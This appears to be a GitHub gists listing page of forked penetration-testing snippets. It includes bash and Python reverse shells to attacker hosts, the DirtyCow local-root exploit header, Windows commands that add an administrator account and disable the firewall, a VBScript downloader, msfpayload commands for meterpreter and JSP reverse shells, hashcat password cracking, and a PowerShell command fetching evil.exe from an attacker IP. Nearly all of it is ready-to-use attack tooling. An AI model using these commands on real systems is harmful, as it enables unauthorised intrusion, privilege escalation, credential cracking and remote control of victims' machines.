Skip to content

Instantly share code, notes, and snippets.

@waywardsun
waywardsun / tricks
Created September 20, 2016 22:46 — forked from sckalath/tricks
tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
@waywardsun
waywardsun / reverse_shells
Created September 20, 2016 22:46 — forked from sckalath/reverse_shells
Reverse shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
@waywardsun
waywardsun / cowroot.c
Created October 21, 2016 18:00 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@waywardsun
waywardsun / windows_crap
Created September 20, 2016 22:46 — forked from sckalath/windows_crap
windows crap
#add a user
net user ryan mwcb /add
#add user to local administrators
net localgroup administrators /add ryan
#remove firewall
netsh firewall set opmode disable
#enabled remote desktop
@waywardsun
waywardsun / password_cracking
Created September 20, 2016 22:46 — forked from sckalath/password_cracking
password cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
@waywardsun
waywardsun / simple_py_shell
Created September 20, 2016 22:46 — forked from sckalath/simple_py_shell
Simple Python Shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
@waywardsun
waywardsun / wget_vbs
Created September 20, 2016 22:46 — forked from sckalath/wget_vbs
wget vbscript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
@waywardsun
waywardsun / metasploit_snippets
Created September 20, 2016 22:45 — forked from sckalath/metasploit_snippets
Metasploit snippets
#autorun script (session.rc)
migrate -k -n explorer.exe
multi_console_command -cl "getsystem","getuid"
get_env
checkvm
#setting msf to use autorunscript above
set autorunscript multiscript.rb -rc /home/ryan/session.rc
@waywardsun
waywardsun / msfpayload_commands
Created September 20, 2016 22:45 — forked from sckalath/msfpayload_commands
msfpayload commands
# generate windows meterpreter on port 4444 that outputs an asp file
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.16.31 LPORT=4444 R | msfencode -o mwcb.asp -e generic/none -t asp
#generate jsp reverse tcp over port 443
msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.16.31 LPORT=443 R > jsprev.jsp
#would likely need to add this jsp to a WAR file for deployment
jar -cvf jsprev.war * #from within the main war directory that also contains the WEB-INF dir
#simple javascript reverse shell over port 443
@waywardsun
waywardsun / powershell_snippets
Created September 20, 2016 22:45 — forked from sckalath/powershell_snippets
Powershell Snippets
# Transfer file from attacking box to victim
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://attackerip/evil.exe"""; $destination="""C:\destination_file.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"